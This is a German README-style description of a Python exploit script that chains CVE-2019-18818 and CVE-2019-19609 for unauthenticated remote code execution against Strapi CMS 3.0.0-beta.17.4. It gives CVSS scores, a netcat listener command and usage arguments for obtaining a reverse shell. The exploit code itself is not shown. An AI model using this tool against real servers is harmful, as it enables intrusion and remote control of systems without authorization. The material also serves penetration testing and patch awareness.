
Python-Exploit-Skript, das auf nicht authentifizierte Remote-Codeausführung in Strapi CMS 3.0.0-beta.17.4 über CVE-2019-18818 und CVE-2019-19609 abzielt und eine Reverse-Shell liefert.
Dieser Exploit zielt auf zwei Schwachstellen im Strapi CMS Framework Version 3.0.0-beta-17.4 ab, die eine nicht authentifizierte Remotecodeausführung (RCE) ermöglichen.
Schwacher Mechanismus zur Wiederherstellung vergessener Passwörter
CVSS: 9.8 - Kritisch
Weitere Details: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
Unzureichende Neutralisierung spezieller Elemente in einem Betriebssystembefehl ('OS Command Injection')
CVSS: 7.2 - Hoch
Weitere Details: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
Bevor Sie diesen Exploit ausführen, starten Sie einen netcat-Listener auf dem lport, den Sie in den folgenden Optionen angeben.
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>